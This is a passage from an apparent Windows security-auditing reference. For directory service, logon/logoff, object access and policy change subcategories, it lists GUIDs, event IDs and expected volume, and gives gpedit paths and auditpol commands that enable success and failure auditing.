You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-access) #### Directory Service Changes - Subcategory GUID: `{0CCE923C-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High on Domain Controllers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `5136` - `5137` - `5138` - `5139` - `5141` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - DS Access - Audit Directory Service Changes - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-changes) #### Directory Service Replication - Subcategory GUID: `{0CCE923D-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Medium on Domain Controllers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4932` - `4933` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - DS Access - Audit Directory Service Replication - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-replication) ### Logon/Logoff #### Account Lockout - Subcategory GUID: `{0CCE9217-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4625 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit Account Lockout - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-account-lockout) #### User/Device Claims - Subcategory GUID: `{0CCE9247-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: - `Low on a client computer.` - `Medium on a domain controller or network servers.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4626 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit User/Device Claims - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-device-claims) #### Group Membership - Subcategory GUID: `{0CCE9249-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: - `Low on a client computer.` - `Medium on a domain controller or network servers.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4627 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit Group Membership - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9249-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9249-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-group-membership) #### IPsec Extended Mode - Subcategory GUID: `{0CCE921A-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4978 - 4979 - 4980 - 4981 - 4982 - 4983 - 4984 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit IPsec Extended Mode - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-extended-mode) #### IPsec Main Mode - Subcategory GUID: `{0CCE9218-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4646 - 4650 - 4651 - 4652 - 4653 - 4655 - 4976 - 5049 - 5453 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit IPsec Main Mode - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-main-mode) #### IPsec Quick Mode - Subcategory GUID: `{0CCE9219-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4977 - 5451 - 5452 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit IPsec Quick Mode - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-quick-mode) #### Logoff - Subcategory GUID: `{0CCE9216-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4634 - 4647 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit Logoff - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logoff) #### Logon - Subcategory GUID: `{0CCE9215-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: - `Low on a client computer.` - `Medium on a domain controller or network servers.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4624 - 4625 - 4648 - 4675 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit Logon - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logon) #### Network Policy Server - Subcategory GUID: `{0CCE9243-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Medium to High on servers that are running Network Policy Server (NPS).` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 6272 - 6273 - 6274 - 6275 - 6276 - 6277 - 6278 - 6279 - 6280 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit Network Policy Server - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-network-policy-server) #### Other Logon/Logoff Events - Subcategory GUID: `{0CCE921C-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4649 - 4778 - 4779 - 4800 - 4801 - 4802 - 4803 - 5378 - 5632 - 5633 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit Other Logon/Logoff Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-logonlogoff-events) #### Special Logon - Subcategory GUID: `{0CCE921B-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: - `Low on a client computer.` - `Medium on a domain controller or network servers.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4964 - 4672 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Logon/Logoff - Audit Special Logon - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-special-logon) ### Object Access #### Application Generated - Subcategory GUID: `{0CCE9222-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4665 - 4666 - 4667 - 4668 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Application Generated - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-generated) #### Certification Services - Subcategory GUID: `{0CCE9221-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low to medium on servers that provide AD CS role services` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4868 - 4869 - 4870 - 4871 - 4872 - 4873 - 4874 - 4875 - 4876 - 4877 - 4878 - 4879 - 4880 - 4881 - 4882 - 4883 - 4884 - 4885 - 4886 - 4887 - 4888 - 4889 - 4890 - 4891 - 4892 - 4893 - 4894 - 4895 - 4896 - 4897 - 4898 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Certification Services - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-certification-services) #### Detailed File Share - Subcategory GUID: `{0CCE9244-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: - `High on file servers.` - `High on domain controllers because of SYSVOL network access required by Group Policy.` - `Low on member servers and workstations.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 5145 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Detailed File Share - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-file-share) #### File Share - Subcategory GUID: `{0CCE9224-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: - `High on file servers.` - `High on domain controllers because of SYSVOL network access required by Group Policy.` - `Low on member servers and workstations.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 5140 - 5142 - 5143 - 5144 - 5168 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit File Share - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-share) #### File System - Subcategory GUID: `{0CCE921D-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Varies, depending on how file system SACLs are configured` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4656 - 4658 - 4660 - 4663 - 4664 - 4670 - 4985 - 5051 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit File System - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-system) #### Filtering Platform Connection - Subcategory GUID: `{0CCE9226-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 5031 - 5150 - 5151 - 5154 - 5155 - 5156 - 5157 - 5158 - 5159 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Filtering Platform Connection - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-connection) #### Filtering Platform Packet Drop - Subcategory GUID: `{0CCE9225-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 5152 - 5153 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Filtering Platform Packet Drop - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-packet-drop) #### Handle Manipulation - Subcategory GUID: `{0CCE9223-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4658 - 4690 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Handle Manipulation - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-handle-manipulation) #### Kernel Object - Subcategory GUID: `{0CCE921F-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4656 - 4658 - 4660 - 4663 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Kernel Object - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kernel-object) #### Other Object Access Events - Subcategory GUID: `{0CCE9227-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Medium to High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4671 - 4691 - 4698 - 4699 - 4700 - 4701 - 4702 - 5148 - 5149 - 5888 - 5889 - 5890 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Other Object Access Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events) #### Registry - Subcategory GUID: `{0CCE921E-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low to Medium, depending on how registry SACLs are configured.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4656 - 4657 - 4658 - 4660 - 4663 - 4670 - 5039 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Registry - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-registry) #### Removable Storage - Subcategory GUID: `{0CCE9245-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4656 - 4658 - 4663 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Removable Storage - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-removable-storage) #### SAM - Subcategory GUID: `{0CCE9220-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High on domain controllers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4661 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit SAM - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sam) #### Central Access Policy Staging - Subcategory GUID: `{0CCE9246-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4818 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Object Access - Audit Central Access Policy Staging - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-central-access-policy-staging) ### Policy Change #### Audit Policy Change - Subcategory GUID: `{0CCE922F-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - 4715 - 4719 - 4817 - 4902 - 4906 - 4907 - 4908 - 4912 - 4904 - 4905 If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Policy Change - Audit Audit Policy Change - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
